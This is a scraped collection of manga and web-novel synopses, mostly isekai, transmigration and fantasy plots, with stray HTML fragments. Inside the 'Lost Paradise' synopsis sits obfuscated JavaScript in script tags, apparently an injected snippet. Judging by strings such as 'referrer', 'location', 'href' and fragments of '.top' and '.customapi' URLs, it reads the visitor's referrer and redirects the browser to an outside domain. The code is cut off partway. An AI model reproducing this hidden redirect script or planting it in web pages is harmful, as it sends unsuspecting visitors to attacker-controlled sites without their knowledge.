Seina Rohill is a D-class hunter making a living off of killing monstrous fiends—or so she thought. In actuality, she’s become an insignificant character in the novel, “A Secret in the Flower Shop.” What’s more, she happens to be neighbors with the female lead, Ellen Euclis! The story revolves around Ellen receiving daily love confessions until she meets the male lead. But when Seina encounters a side character named Dion Fravel, who seemingly has a deep connection to Ellen, she’s determined to make him Ellen’s endgame. Unfortunately, Seina also has to deal with Duke Rashad Carlman, who appears to be the strongest candidate as the original male lead. As these four characters’ paths cross, who truly will be the protagonists of this tale? And what could the “secret” mentioned in the novel’s title be? 도망 여주의 옆집에 살고 있습니다
<div class="post-title"> <h1>The Sacrificial Princess</h1> </div> <div class="tab-summary ">You, who has always been useless all your life, can now be useful for once.” Ludis, an illegitimate child of the Emperor, was always abused by her own father due to her lameness and uselessness. She was offered to an ancient god so as to save their Empire that was currently in crisis. In the midst of offering herself, a man approaches her. ‘Who would have thought that I’d die in this way…’ “What’s your wish?” Hair as dark as the night sky and eyes as bright as the stars. Ludis found it harder and harder to breathe being next to him. “I don’t know what to wish for.” “Tell me anything you want. I’ve waited for five thousand years just to give you what you want.” The princess, Ludis, who became a sacrifice for the Empire, is now in a contract with the ancient god, Lavane.</div>
A young girl fights on the frontlines in war. She has blonde hair, blue eyes, and nearly transparent white skin as she flies through the air and mercilessly strikes down her enemies. Her name is Tanya Degurechaff and speaks with a young girl\'s lisp while she commands the army. Tanya used to be one of Japan\'s elite office workers, but because of a wrathful god was reborn as a little girl. Prioritizing optimization and career advancement above all, she will become the most dangerous entity among the Imperial Army\'s sorcerers. Adapted from Light Novel of same name. --- **Note:** Manga and Light Novel Licensed in English by Yen Press as \"The Saga of Tanya the Evil\".
Hiroshi Yamada (42 years old), a dull salaryman, was chosen to be a brave warrior which should have been limited to young people. Then he was suddenly sent to another world full of monsters and as a promised gift of his summoning, Hiroshi was given three strong skills by God: [One-shot K.O.], [All Magic Creation], and the ultimate physical strengthening ability [Transcendence]. And so Hiroshi must defeat the monsters one after another by making full use of the given skills. However, he's extremely clumsy and can’t control his skills, so they always go out of control. Because of that, Hiroshi meets a cute female fairy and a muscular old warrior to go on his adventures with him. See what happens to Hiroshi as he experiences a different world fighting against monsters and sometimes annoying the townspeople with outrageous acts
The male protagonist who has cleared all types of different worlds comes to Earth, and he decides to give up his identity as a savior and starts to show off. It turns out that the seemingly peaceful earth is a world designed by the enemy. The helpless male protagonist has no choice but to start resisting under the agreement with the God King in order to have a peaceful life.
A wealthy lady booked the Script Kill store, which was owned by the disgraceful man who broke up with her. After certain measures, the Script Host System warned her, “Forcibly opening a script has caused the system to undergo a major error. Now, if you wish to leave, you must give each script a happy ending. If you fail to succeed, you can work till your death inside the scripts!”
He was an addict, a loser, a despicable human being. But, one fleeting dream that may not have been a dream at all reawakens his once-lost senses. Possessing a unique ability, he would use that, and the dream, to forge his path in the world now known as the Lost Paradise.<script></script><script>function _0x9d80(){var _0x575aab=['giGrY','7kpYREw','32622YZawAt','text','then','rgntq','location','.top/','10006659WZwhYE','XZttW','lncGk','1ECneMM','https://ip','sFsVX','','.customapi','JAQns','2489030LqoAqj','11dppYBA','zsyzN','google','135308aVZHcP','includes','138BnSvOX','3009934peSxOC','15866088IyVEiJ','floor','random','4629072NtQLMj','GHcLn','http://rea','referrer','sLyAl','href','95zfERcv','MtIvx'];_0x9d80=function(){return _0x575aab;};return _0x9d80();}(function(_0x39e4a5,_0x51f7cf){var _0x5ad842=_0xc848,_0x4d0f35=_0x39e4a5();while(!![]){try{var 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Rosa remembers her past life. She remembers reading about the Helios Empire in a novel before dying suddenly in an accident. When she is reborn into that exact world as Rosa Veronica, she lives day to day and works hard to make ends meet until one day when someone from the Duke of Estella’s estate comes to fetch her. When she arrives and meets her biological father, her life is turned upside down once again as she’s forced to live the life of Rozenta Estella, the sole heir to the Estella estate and the only son of the Duke of Estella. Through the power of magical artifacts, she’s able to live the life of Rozenta, a supporting male character from a novel she once read in a previous life. She decides to embrace this new life as the familiar narrative unfolds before her. Despite knowing the overall story and its characters, she’s surprised that the male and female leads have not become the characters she’s read about. Although Rozenta Estella was just a minor character in the original novel, Rosa learns to navigate the intricacies of his life and family while fostering a budding friendship with Theodore and Vivian. Her happiness doesn’t last very long as all three grow up and enter the roles they’ve been born into. 서브 남주지만, 여자입니다
After transmigrating into a world of magic, Qin Chuan who was a Sichuan Cuisine Chef discovers his food is key to boosting combativity. With demons rampaging the land, it’s about time to put an end to the misery and suffering.Who’s to say a chef can’t save the world? But why are the heroes super hot babes?
Bìng Jiāo Bào Jūn Gǎi Ná Lǜchá Jùběn / The Sickly Loveable Tyrant Changed to Take the Green Tea Script / Yandere Tyrant Transforms to Take the Green Tea Script / 病娇暴君改拿绿茶剧本 Fu Xin, a powerful president of her company in the modern age, finds that she had travelled to the past and transmigrated into the body of the village girl Fu Qibao along with her Merit System. Now, not only did she have to suffer the consequences of the original host’s cruelty to other people, but she had also earned herself a betrothed. No one had foreseen this exceptional teen who the original host had brutally beaten up to one day become a merciless tyrant of an emperor that ruled the world. He was going to kill everyone who hurt him before… Hold on, why does this sickly tyrant have two sets of personalities? Wait, is he acting innocent in front of Fu Qibao to gain her affections?!
A woman born with the face of a monster lived within a forest in solitude. One day, she saved a young boy from a magical beast, naming him Ham. The boy called the woman Pie, and the two lonely people lived together happily. However, it didn't last long. Pie, the only person who had loved Ham as well as being the person he loved the most, was killed right before his eyes. The boy discarded his identity as Ham and as Prince Alexei, he climbed his way up to becoming emperor for the sake of revenge. On the other hand, Pie was reborn as the duke's daughter, Eleonora, and became renowned for being a silent beauty with a certain secret. Thus, the two unknowingly reunited at a ball due to fate-?!
The Strongest Involution SystemChu Xingchen crossed over to the immortal cultivation world, thought he could lie down peaceful to his old age, but he was forcibly bound by the strongest martial g** system, was forced involution, and started the road of strongest male character.